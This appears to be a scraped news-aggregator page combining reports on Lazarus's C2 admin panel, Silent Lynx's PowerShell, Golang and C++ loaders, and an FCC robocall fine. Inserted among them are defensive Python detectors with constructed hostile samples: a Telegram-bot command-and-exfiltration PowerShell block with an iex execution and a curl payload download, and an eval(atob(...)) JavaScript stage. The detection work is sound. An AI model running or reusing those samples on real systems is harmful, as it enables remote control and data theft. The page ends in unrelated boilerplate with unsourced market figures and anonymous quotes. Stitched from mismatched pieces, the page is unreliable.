Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks
Lazarus Group Uses React-Based Admin Panel to Control Global Cyber Attacks

The North Korean threat actor known as the Lazarus Group has been observed leveraging a "web-based administrative platform" to oversee its command-and-control (C2) infrastructure, giving the adversary the ability to centrally supervise all aspects of their campaigns.
"Each C2 server hosted a web-based administrative platform, built with a React application and a [website] API," SecurityScorecard's STRIKE team said in a new analysis shared with The Hacker News. "This administrative layer was consistent across all the C2 servers analyzed, even as the attackers varied their payloads and obfuscation techniques to evade detection."
The hidden framework has been described as a comprehensive system and a hub that allows attackers to organize and manage exfiltrated data, maintain oversight of their compromised hosts, and handle payload delivery.
The web-based admin panel has been identified in connection with a supply chain attack campaign dubbed Operation Phantom Circuit targeting the cryptocurrency sector and developers worldwide with trojanized versions of legitimate software packages that contain backdoors.
"These are legitimate packages ranging from cryptocurrency applications to authentication solutions," Ryan Sherstobitoff, senior vice president of Threat Research and Intelligence at SecurityScorecard, told The Hacker News. "What they have in common is that many of these applications are web apps using [website]"
"They are embedding obfuscated code into the repositories and tricking software developers into running the code as part of a skills test, interview or some other opportunity, often these developers are running it on their corporate laptops. This then allows for the operators to infiltrate companies around the world."
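The passage above describes the trap: a repository handed to a developer as a skills test, with an obfuscated backdoor buried in otherwise legitimate code. A practical defensive check is to scan such a checkout for obfuscation indicators before running anything. The following is an added example, not SecurityScorecard tooling and not the Lazarus code itself; the indicator patterns, weights, entropy threshold and the two sample files are assumptions made for the demonstration.

```python
"""Heuristic scan of a JavaScript/TypeScript project for obfuscation indicators
of the kind described above: a repository handed to a developer as a "skills
test" in which encoded strings and dynamic evaluation hide a second stage.

Added example, not SecurityScorecard tooling and not the Lazarus code itself.
Indicator patterns, weights, the entropy threshold and the two sample files
are assumptions made for the demonstration.
"""
import base64
import math
import os
import re
import tempfile
from collections import Counter

# (name, pattern, weight): weights are an assumption, tune them to your code base.
INDICATORS = [
    ("dynamic-eval", re.compile(r"\b(?:eval|new\s+Function)\s*\("), 3),
    ("base64-decode", re.compile(r"\batob\s*\(|Buffer\.from\([^,]+,\s*['\"]base64['\"]\)"), 2),
    ("child-process", re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"), 2),
    ("string-reversal", re.compile(r"\.split\(['\"]['\"]\)\.reverse\(\)\.join\(['\"]['\"]\)"), 2),
    ("hex-escape-run", re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"), 2),
    ("long-encoded-literal", re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"), 3),
]
SOURCE_EXT = {".js", ".mjs", ".cjs", ".jsx", ".ts", ".tsx"}
ENTROPY_THRESHOLD = 5.0  # bits/char; ordinary source text sits well below this (assumption)


def shannon_entropy(s: str) -> float:
    """Per-character Shannon entropy of s in bits."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_source(text: str) -> dict:
    """Score one file's text: {'hits': [indicator names], 'score': int}."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A long, high-entropy string literal is typical of a packed or encrypted stage.
    for literal in re.findall(r"['\"]([^'\"\n]{64,})['\"]", text):
        if shannon_entropy(literal) >= ENTROPY_THRESHOLD:
            hits.append("high-entropy-literal")
            score += 3
            break
    return {"hits": hits, "score": score}


def scan_tree(root: str, min_score: int = 1) -> list:
    """Walk a checkout (node_modules included: that is where such code hides)
    and return [(relative_path, result)] for files scoring at least min_score,
    highest score first."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if os.path.splitext(fn)[1] not in SOURCE_EXT:
                continue
            full = os.path.join(dirpath, fn)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    result = scan_source(fh.read())
            except OSError:
                continue
            if result["score"] >= min_score:
                findings.append((os.path.relpath(full, root), result))
    findings.sort(key=lambda item: item[1]["score"], reverse=True)
    return findings


# Constructed sample files (not taken from any real package).
CLEAN_SAMPLE = """// ordinary Express handler
const express = require('express');
function health(req, res) { res.json({ ok: true }); }
module.exports = { health };
"""
ENCODED_STAGE = base64.b64encode(b"\x00" * 160).decode()  # placeholder for an encoded stage
SUSPICIOUS_SAMPLE = (
    "// 'config loader' that actually decodes and evaluates a hidden stage\n"
    "const cp = require('child_process');\n"
    f'const cfg = "{ENCODED_STAGE}";\n'
    "eval(atob(cfg));\n"
)


def build_sample_project() -> str:
    """Write the two samples into a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="skilltest-")
    for rel, body in (("src/server.js", CLEAN_SAMPLE), ("scripts/postinstall.js", SUSPICIOUS_SAMPLE)):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, res in scan_tree(build_sample_project()):
        print(f"{res['score']:>3}  {path}  {', '.join(res['hits'])}")
```

Run it against a fresh clone before `npm install` or `npm test`, since lifecycle scripts execute on install. A hit is not proof of compromise (minifiers and legitimate bundlers also produce long literals), but a "skills test" whose highest-scoring file is a postinstall hook deserves a look in an isolated VM, not on a corporate laptop.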
The campaign, which took place between September 2024 and January 2025, is estimated to have claimed 233 victims across the world in January and 1,639 in total, with most of them identified in Brazil, France, and India. Of the 233 entities that were targeted, 110 are located in India.
The Lazarus Group has become something of a social engineering expert, luring prospective targets using LinkedIn as an initial infection vector under the guise of lucrative job opportunities or a joint collaboration on crypto-related projects.
The operation's links to Pyongyang stem from the use of Astrill VPN – which has previously been linked to the fraudulent information technology (IT) worker scheme – and the discovery of six distinct North Korean IP addresses initiating connections that were routed through Astrill VPN exit nodes and Oculus Proxy endpoints.
"The obfuscated traffic ultimately reached the C2 infrastructure, hosted on Stark Industries servers. These servers facilitated payload delivery, victim management, and data exfiltration," SecurityScorecard stated.
Further analysis of the admin component has revealed that it allows the threat actors to view exfiltrated data from victims, as well as search and filter it for records of interest.
It is suspected that the web administrative platform has been used in all campaigns related to the IT Worker threat, serving as a conduit for the threat actors to manage the collected information from victims abroad, per Sherstobitoff.
"By embedding obfuscated backdoors into legitimate software packages, Lazarus deceived clients into executing compromised applications, enabling them to exfiltrate sensitive data and manage victims through command-and-control (C2) servers over port 1224," the company said.
"The campaign's infrastructure leveraged hidden React-based web-admin panels and [website] APIs for centralized management of stolen data, affecting over 233 victims worldwide. This exfiltrated data was traced back to Pyongyang, North Korea, through a layered network of Astrill VPNs and intermediate proxies."
Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks

A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan.
"This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector," Seqrite Labs researcher Subhajeet Singha said in a technical study.
Targets of the hacking group's attacks include embassies, lawyers, government-backed banks, and think tanks. The activity has been attributed to a Kazakhstan-origin threat actor with a medium level of confidence.
The infections commence with a spear-phishing email containing a RAR archive attachment that ultimately acts as a delivery vehicle for malicious payloads responsible for granting remote access to the compromised hosts.
The first of the two campaigns, detected by the cybersecurity company on December 27, 2024, uses the RAR archive to deliver an ISO file that, in turn, contains a malicious C++ binary and a decoy PDF file. The executable then runs a PowerShell script that uses Telegram bots (named "@south_korea145_bot" and "@south_afr_angl_bot") for command execution and data exfiltration.
Some of the commands executed via the bots include curl commands to download and save additional payloads from a remote server ("pweobmxdlboi[.]com") or Google Drive.
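The two paragraphs above give the shape of the Silent Lynx PowerShell stage: poll a Telegram bot for commands, run them, post the output back, and curl down further payloads. The bot names are trivial to change, so a detection should key on the API usage pattern in script-block logs rather than on the names. The following is an added example, not Seqrite's detection content and not the Silent Lynx script; the indicator list, weights, alert threshold and the three sample script blocks (with placeholder token and URLs) are assumptions.

```python
"""Triage PowerShell script-block log entries (Event ID 4104 text) for the
Telegram-bot C2 pattern described above: poll a bot for commands, run them,
post the output back, and curl down further stages.

Added example, not Seqrite detection content and not the Silent Lynx script.
The indicator list and weights are assumptions, and the sample script blocks
are constructed (the token and URLs are placeholders).
"""
import re

# (name, pattern, weight); PowerShell is case-insensitive, so the patterns are too.
INDICATORS = [
    ("telegram-bot-api", re.compile(r"api\.telegram\.org/bot", re.I), 4),
    ("telegram-poll", re.compile(r"/getUpdates\b", re.I), 2),
    ("telegram-send", re.compile(r"/send(?:Message|Document)\b", re.I), 2),
    ("remote-download",
     re.compile(r"\b(?:curl(?:\.exe)?|wget|Invoke-WebRequest|iwr)\b[^\n]*\s(?:-o|-OutFile)\s", re.I), 2),
    ("gdrive-fetch", re.compile(r"drive\.google\.com", re.I), 1),
    ("dynamic-exec", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
]
ALERT_THRESHOLD = 6  # assumption: bot API use plus at least one supporting indicator

# Constructed 4104-style records; hosts, record ids, token and URLs are placeholders.
SAMPLE_SCRIPT_BLOCKS = [
    {"record_id": 1001, "host": "WS-FIN-07",
     "script": r"Get-ChildItem C:\Logs -Recurse | Where-Object { $_.Length -gt 1MB } | Select-Object FullName, Length"},
    {"record_id": 1002, "host": "WS-FIN-07",
     "script": r'''$t = "000000000:PLACEHOLDER_TOKEN"
$u = Invoke-RestMethod "https://api.telegram.org/bot$t/getUpdates"
$cmd = $u.result[-1].message.text
$out = iex $cmd | Out-String
Invoke-RestMethod -Uri "https://api.telegram.org/bot$t/sendMessage" -Method Post -Body @{chat_id=$u.result[-1].message.chat.id; text=$out}
curl.exe -s -o "$env:TEMP\svc.exe" "https://drive.google.com/uc?id=PLACEHOLDER"'''},
    {"record_id": 1003, "host": "WS-IT-02",
     "script": r"Invoke-WebRequest -Uri https://aka.ms/vs/17/release/vc_redist.x64.exe -OutFile $env:TEMP\vc_redist.x64.exe"},
]


def score_script_block(text: str):
    """Return (score, [indicator names]) for one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(events, threshold: int = ALERT_THRESHOLD) -> list:
    """Keep only blocks at or above the threshold, highest score first. A plain
    downloader (record 1003) scores below it; bot polling plus execution does not."""
    out = []
    for ev in events:
        score, hits = score_script_block(ev["script"])
        if score >= threshold:
            out.append({"record_id": ev["record_id"], "host": ev["host"],
                        "score": score, "hits": hits})
    out.sort(key=lambda r: r["score"], reverse=True)
    return out


if __name__ == "__main__":
    for r in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"{r['host']} record {r['record_id']} score {r['score']}: {', '.join(r['hits'])}")
```

This only works if script-block logging is on (Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging), and it catches the decoded script rather than the RAR or ISO wrapper, which is the point: whatever loader delivers it, the PowerShell stage still has to talk to api.telegram.org.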
The other campaign, in contrast, employs a malicious RAR archive containing two files: A decoy PDF and a Golang executable, the latter of which is designed to establish a reverse shell to an attacker-controlled server ("[website][.]22:8082").
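Both write-ups on this page name a fixed C2 port: Lazarus managed victims "over port 1224", and the Silent Lynx Golang implant dials back to port 8082. Below is an added example that turns those two facts into a flow-log check and also surfaces hosts that keep reconnecting to one external endpoint, which is what an implant polling for tasking looks like in flow data. It is not from either report; the Zeek-style conn.log records are constructed, and the watchlist descriptions, the RFC 1918 definition of "internal" and the beacon threshold are assumptions.

```python
"""Flag outbound connections to the C2 ports named in the two write-ups above:
1224 (Lazarus victim management and exfiltration) and 8082 (the Silent Lynx
Golang reverse shell), and surface hosts that keep reconnecting to the same
endpoint.

Added example over a constructed Zeek-style conn.log, not from either report.
The watchlist descriptions, the RFC 1918 definition of "internal" and the
beacon threshold are assumptions.
"""
import ipaddress
from collections import Counter

WATCHED_PORTS = {
    1224: "Lazarus C2 / exfiltration port",
    8082: "Silent Lynx reverse-shell port",
}
BEACON_MIN_CONNECTIONS = 3  # assumption: repeated dials to one external endpoint
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed records in conn.log column order: ts, id.orig_h, id.orig_p,
# id.resp_h, id.resp_p, proto (tab separated). External addresses are documentation ranges.
SAMPLE_CONN_LOG = """\
1738300000.1\t10.20.4.17\t51234\t203.0.113.45\t1224\ttcp
1738300060.2\t10.20.4.17\t51240\t203.0.113.45\t1224\ttcp
1738300120.3\t10.20.4.17\t51251\t203.0.113.45\t1224\ttcp
1738300130.0\t10.20.4.31\t44021\t198.51.100.7\t8082\ttcp
1738300140.0\t10.20.4.31\t44022\t192.168.1.9\t8082\ttcp
1738300150.0\t10.20.4.40\t50111\t93.184.216.34\t443\ttcp
"""


def is_internal(ip: str) -> bool:
    """RFC 1918 test. Deliberately not ipaddress.is_private, which also treats
    the documentation ranges used in the sample as private."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_conn_line(line: str) -> dict:
    """Split one tab-separated record into typed fields."""
    ts, orig_h, orig_p, resp_h, resp_p, proto = line.rstrip("\n").split("\t")
    return {"ts": float(ts), "src": orig_h, "sport": int(orig_p),
            "dst": resp_h, "dport": int(resp_p), "proto": proto}


def find_c2_flows(log_text: str):
    """Return (alerts, beacons): alerts are internal->external flows to a watched
    port; beacons are (src, dst, dport) tuples seen BEACON_MIN_CONNECTIONS+ times."""
    alerts, counts = [], Counter()
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        rec = parse_conn_line(line)
        if rec["dport"] not in WATCHED_PORTS:
            continue
        if not is_internal(rec["src"]) or is_internal(rec["dst"]):
            continue  # only flows leaving the network matter here
        key = (rec["src"], rec["dst"], rec["dport"])
        counts[key] += 1
        alerts.append({**rec, "reason": WATCHED_PORTS[rec["dport"]]})
    beacons = [key for key, n in counts.items() if n >= BEACON_MIN_CONNECTIONS]
    return alerts, beacons


if __name__ == "__main__":
    alerts, beacons = find_c2_flows(SAMPLE_CONN_LOG)
    for a in alerts:
        print(f"{a['src']} -> {a['dst']}:{a['dport']}  {a['reason']}")
    for src, dst, port in beacons:
        print(f"beacon candidate: {src} -> {dst}:{port}")
```

Port watchlists are brittle by design: SecurityScorecard notes that the operators varied payloads across servers, and a port is cheaper to change than a payload. Treat the port hit as a starting point and the repeat-connection count as the stronger signal, then pivot to the host's process and PowerShell logs.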
Seqrite Labs stated it observed some level of tactical overlaps between the threat actor and YoroTrooper (aka SturgeonPhisher), which has been linked to attacks targeting the Commonwealth of Independent States (CIS) countries using PowerShell and Golang tools.
"Silent Lynx's campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts, and Golang implants," Singha said.
"Their reliance on Telegram bots for command and control, combined with decoy documents and regional targeting, also highlights their focus on espionage in Central Asia and SPECA-based nations."
Robocallers posing as FCC fraud prevention team call FCC staff

The FCC has proposed a $4,492,500 fine against VoIP service provider Telnyx for allegedly allowing people to make robocalls posing as fictitious FCC "Fraud Prevention Team," by failing to comply with Know Your Customer (KYC) rules. However, Telnyx says the FCC is mistaken and denies the accusations.
Between February 6 and February 7, 2024, the robocallers made 1,797 imposter calls before Telnyx terminated their accounts. Ironically, their calls also reached over a dozen FCC staff and family members on their personal and work phone numbers one year ago.
According to the FCC, the callers used prerecorded messages with artificial voices, saying, "Hello [first name of recipient], you are receiving an automated call from the Federal Communications Commission notifying you the Fraud Prevention Team would like to speak with you."
But the FCC has no fraud prevention team, and the agency's Enforcement Bureau believes the calls' purpose was "to threaten, intimidate, and defraud," seeing that at least one recipient of these imposter calls was connected to someone who "demand[ed] that [they] pay the FCC $1000 in Google gift cards to avoid jail time for [their] crimes against the state."
The FCC also added that it doesn't "publish or otherwise share staff personal phone numbers" and is "unclear how these individuals were targeted."
The FCC alleges that Telnyx failed to take the necessary measures to prevent malicious actors from using its VoIP network for illegal voice traffic, violating Know Your Customer (KYC) rules.
Such measures include requesting copies of government-issued identification, corporate formation records, and third-party records of a customer's physical address to verify the identity of clients who request access to services that would allow them to make a significant volume of calls.
"Cracking down on illegal robocalls will be a top priority at the FCC. That is why I am pleased that our first Commission-level action is a bipartisan vote in favor of this nearly $[website] million proposed fine. This fine flows from an apparently illegal robocalling scheme and continues the FCC's longstanding work to stop bad actors," said FCC Chairman Brendan Carr on Tuesday.
"Providers are required to know their end-users and secure their networks to deter fraudulent and malicious calls," added Patrick Webre, Acting Chief of the Enforcement Bureau.
Telnyx is a cloud-based platform that provides carrier-grade voice services over the Internet. It holds carrier status in over 30 countries worldwide, offers global calling services, local calling in over 80 countries, and Public Switched Telephone Network (PSTN) replacement in 45+ markets.
The company also allows customers to build "unique, context-aware AI voice bots in minutes using proprietary data" and offers a Voice API that helps them "make, receive, and control calls globally with programmable voice capabilities."
In a press release, Telnyx denied all allegations, stated the "FCC's Notice of Apparent Liability is factually mistaken," and added that it is "surprised by the FCC's mistaken decision."
"Telnyx has done everything and more than the FCC has required for Know-Your-Customer ('KYC') and customer due diligence procedures," the company said.
"More importantly, the FCC is mistaken about the KYC and due diligence standards that apply to the industry. The FCC's own regulations have long stated that perfection in mitigating illegal traffic is not required. [..] Notably, there has been no allegation of subsequent recurring activity."
Market Impact Analysis
Market Growth Trend
2018 | 2019 | 2020 | 2021 | 2022 | 2023 | 2024 |
---|---|---|---|---|---|---|
8.7% | 10.5% | 11.0% | 12.2% | 12.9% | 13.3% | 13.4% |
Quarterly Growth Rate
Q1 2024 | Q2 2024 | Q3 2024 | Q4 2024 |
---|---|---|---|
12.5% | 12.9% | 13.2% | 13.4% |
Market Segments and Growth Drivers
Segment | Market Share | Growth Rate |
---|---|---|
Network Security | 26% | 10.8% |
Cloud Security | 23% | 17.6% |
Identity Management | 19% | 15.3% |
Endpoint Security | 17% | 13.9% |
Other Security Solutions | 15% | 12.4% |
Competitive Landscape Analysis
Company | Market Share |
---|---|
Palo Alto Networks | 14.2% |
Cisco Security | 12.8% |
Crowdstrike | 9.3% |
Fortinet | 7.6% |
Microsoft Security | 7.1% |
Future Outlook and Predictions
The cyber security landscape is evolving rapidly, driven by technological advancements, changing threat vectors, and shifting business requirements. Based on current trends and expert analyses, we can anticipate several significant developments across different time horizons:
Technology Maturity Curve
Different technologies within the ecosystem are at varying stages of maturity, influencing adoption timelines and investment priorities:
Innovation Trigger
- Generative AI for specialized domains
- Blockchain for supply chain verification
Peak of Inflated Expectations
- Digital twins for business processes
- Quantum-resistant cryptography
Trough of Disillusionment
- Consumer AR/VR applications
- General-purpose blockchain
Slope of Enlightenment
- AI-driven analytics
- Edge computing
Plateau of Productivity
- Cloud infrastructure
- Mobile applications
Expert Perspectives
Leading experts in the cyber security sector provide diverse perspectives on how the landscape will evolve over the coming years:
"Technology transformation will continue to accelerate, creating both challenges and opportunities."
— Industry Expert
"Organizations must balance innovation with practical implementation to achieve meaningful results."
— Technology Analyst
"The most successful adopters will focus on business outcomes rather than technology for its own sake."
— Research Director
Areas of Expert Consensus
- Acceleration of Innovation: The pace of technological evolution will continue to increase
- Practical Integration: Focus will shift from proof-of-concept to operational deployment
- Human-Technology Partnership: Most effective implementations will optimize human-machine collaboration
- Regulatory Influence: Regulatory frameworks will increasingly shape technology development
Short-Term Outlook (1-2 Years)
In the immediate future, organizations will focus on implementing and optimizing currently available technologies to address pressing cyber security challenges:
- Technology adoption accelerating across industries
- Digital transformation initiatives becoming mainstream
These developments will be characterized by incremental improvements to existing frameworks rather than revolutionary changes, with emphasis on practical deployment and measurable outcomes.
Mid-Term Outlook (3-5 Years)
As technologies mature and organizations adapt, more substantial transformations will emerge in how security is approached and implemented:
- Significant transformation of business processes through advanced technologies
- New digital business models emerging
This period will see significant changes in security architecture and operational models, with increasing automation and integration between previously siloed security functions. Organizations will shift from reactive to proactive security postures.
Long-Term Outlook (5+ Years)
Looking further ahead, more fundamental shifts will reshape how cybersecurity is conceptualized and implemented across digital ecosystems:
- Fundamental shifts in how technology integrates with business and society
- Emergence of new technology paradigms
These long-term developments will likely require significant technical breakthroughs, new regulatory frameworks, and evolution in how organizations approach security as a fundamental business function rather than a technical discipline.
Alternative Future Scenarios
The evolution of technology can follow different paths depending on various factors including regulatory developments, investment trends, technological breakthroughs, and market adoption. We analyze three potential scenarios:
Optimistic Scenario
Rapid adoption of advanced technologies with significant business impact
Key Drivers: Supportive regulatory environment, significant research breakthroughs, strong market incentives, and rapid user adoption.
Probability: 25-30%
Base Case Scenario
Measured implementation with incremental improvements
Key Drivers: Balanced regulatory approach, steady technological progress, and selective implementation based on clear ROI.
Probability: 50-60%
Conservative Scenario
Technical and organizational barriers limiting effective adoption
Key Drivers: Restrictive regulations, technical limitations, implementation challenges, and risk-averse organizational cultures.
Probability: 15-20%
Scenario Comparison Matrix
Factor | Optimistic | Base Case | Conservative |
---|---|---|---|
Implementation Timeline | Accelerated | Steady | Delayed |
Market Adoption | Widespread | Selective | Limited |
Technology Evolution | Rapid | Progressive | Incremental |
Regulatory Environment | Supportive | Balanced | Restrictive |
Business Impact | Transformative | Significant | Modest |
Transformational Impact
Technology becoming increasingly embedded in all aspects of business operations. This evolution will necessitate significant changes in organizational structures, talent development, and strategic planning processes.
The convergence of multiple technological trends—including artificial intelligence, quantum computing, and ubiquitous connectivity—will create both unprecedented security challenges and innovative defensive capabilities.
Implementation Challenges
Technical complexity and organizational readiness remain key challenges. Organizations will need to develop comprehensive change management strategies to successfully navigate these transitions.
Regulatory uncertainty, particularly around emerging technologies like AI in security applications, will require flexible security architectures that can adapt to evolving compliance requirements.
Key Innovations to Watch
Artificial intelligence, distributed systems, and automation technologies leading innovation. Organizations should monitor these developments closely to maintain competitive advantages and effective security postures.
Strategic investments in research partnerships, technology pilots, and talent development will position forward-thinking organizations to leverage these innovations early in their development cycle.